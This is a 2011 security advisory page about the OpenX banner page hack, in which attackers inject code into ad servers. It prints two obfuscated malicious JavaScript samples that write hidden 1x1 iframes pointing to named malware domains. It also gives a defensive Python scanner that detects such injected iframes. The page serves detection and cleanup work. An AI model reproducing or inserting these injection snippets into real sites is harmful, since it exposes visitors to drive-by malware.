
OpenX Banner Page Hack

Updated: November 4, 2011

The OpenX banner page hack places malicious JavaScript or an iframe into the banner page (/www/delivery/ajs.php) produced by an OpenX ad server. This is sometimes accomplished with a plugin, and in other cases the code is injected into the OpenX database. In some cases the hackers have also inserted backdoor scripts, which give them remote access to the ad server, into some of the hacked ad servers. In some cases the hackers have also added additional user accounts to the ad server.

It is possible that ad servers running versions up to 2.8.7 are vulnerable (check which version you are currently running), as OpenX warns that 2.8.7 "might be vulnerable to certain attacks and is probably not secure." Previously, OpenX had announced that they patched an undisclosed vulnerability in version 2.8.7; they also have a post with advice on cleaning up after a hack that takes advantage of this. A previous hack infected ad servers in December of 2009 and was patched in version 2.8.3.

Recent Code In Append Field:

<script language="JavaScript">var dc=document; var date_ob=new Date(); dc.cookie='h1=o; path=/;';if(dc.cookie.indexOf('3=llo') <= 0 && dc.cookie.indexOf('1=o') > 0){
function clng(wrd){var cou=new Array('en-us','en-ca','en-au','en-gb','fr-ca','fr','de','es','it');for(i=0;i<cou.length;i++){if(wrd==cou[i])return true;}return false;}
if(typeof navigator.language == 'undefined'){var nav = navigator.userLanguage} else {var nav = navigator.language;}
if(typeof run == 'undefined'&&clng(nav.toLowerCase())){dc.writeln("<script type=\"text/javascript\"><!--");dc.writeln("var host=' widt'+'h=1 h'+'eight'+'=1 '; var src='src='; var brdr='fra'+'mebor'+'der='+'0';var sc='\"http://vrominet.com/ry081q2d52c.php?s=IBB@G\" ';");dc.writeln("document.write('<ifr'+'ame'+host+src+sc+brdr+'></ifra'+'me>');");dc.writeln("//--><\/script>");} var run=1;
date_ob.setTime(date_ob.getTime()+86400000);dc.cookie='h3=llo; path=/; expires='+date_ob.toGMTString();}</script>

Recent Script Format:

if(typeof run == \'undefined\'){dc.writeln(\"<"+"script type=\\\"text/javascript\\\"><"+"!--\");dc.writeln(\"var host=\' widt\'+\'h=1 h\'+\'eight\'+\'=1 \'; var src=\'src=\'; var brdr=\'fra\'+\'mebor\'+\'der=\'+\'0\';var sc=\'\\\"http://frentomst.com/xp/index.php?s=IBB@G\\\" \';\");dc.writeln(\"document.write(\'<"+"ifr\'+\'ame\'+host+src+sc+brdr+\'\\\"><"+"/ifra\'+\'me>\');\");dc.writeln(\"//--><"+"\\/script>\");} var run=1;\n
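Both formats above hide the iframe tag by splitting it across concatenated string literals, so a plain search for "<iframe" in the append field misses them. The following check is an added example, not code from the original page or from OpenX: it assumes the append/prepend values have been exported from the ad server database as rows keyed by the hypothetical names `bannerid`, `append` and `prepend`, and the sample rows and hosts are constructed placeholders.

```python
import re
from urllib.parse import urlparse

CONCAT = re.compile(r"""['"]\s*\+\s*['"]""")   # joins 'ifr'+'ame' into iframe
URL = re.compile(r"""https?://[^\s'"<>\\]+""", re.I)
IFRAME = re.compile(r"<\s*iframe", re.I)
TINY = re.compile(r"""width\s*=\s*['"]?[01]\b.{0,40}?height\s*=\s*['"]?[01]\b""", re.I | re.S)
WRITE = re.compile(r"\.write(ln)?\s*\(", re.I)

def normalize(value):
    """Drop backslash escaping, then join string literals split with '+'."""
    return CONCAT.sub("", value.replace("\\", ""))

def scan_field(value):
    """Return (findings, hosts) for one append/prepend value."""
    flat = normalize(value)
    findings = []
    if IFRAME.search(flat):
        findings.append("iframe" if IFRAME.search(value) else "iframe-obfuscated")
        if TINY.search(flat):
            findings.append("hidden-1x1")
    if WRITE.search(flat):
        findings.append("document-write")
    hosts = sorted({urlparse(u).hostname for u in URL.findall(flat)} - {None})
    return findings, hosts

def flag_rows(rows, fields=("append", "prepend")):
    """Return (bannerid, field, findings, hosts) for values that build an iframe."""
    hits = []
    for row in rows:
        for field in fields:
            findings, hosts = scan_field(row.get(field) or "")
            if any(f.startswith("iframe") for f in findings):
                hits.append((row["bannerid"], field, findings, hosts))
    return hits

# Constructed sample rows modelled on the two formats above; hosts are placeholders.
SAMPLE_ROWS = [
    {"bannerid": 1, "append": ""},
    {"bannerid": 2, "append": "<img src='https://stats.example.org/p.gif' width='1' height='1'>"},
    {"bannerid": 3, "append": """<script>var dc=document;var host=' widt'+'h=1 h'+'eight'+'=1 ';"""
        """var sc='"http://bad-host.example/x.php?s=1" ';dc.writeln("document.write("""
        """'<ifr'+'ame'+host+'src='+sc+'></ifra'+'me>');");</script>"""},
    {"bannerid": 4, "append": r"""dc.writeln(\"document.write(\'<"+"ifr\'+\'ame\'+host+"""
        r"""\'><"+"/ifra\'+\'me>\');\");"""},
]

if __name__ == "__main__":
    for hit in flag_rows(SAMPLE_ROWS):
        print(hit)
```

The normalization is a heuristic, so flagged rows still need manual review against the banners you actually configured. Injection through a plugin, which the page also describes, does not appear in these fields and has to be checked separately.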

Recent Malware Domains:
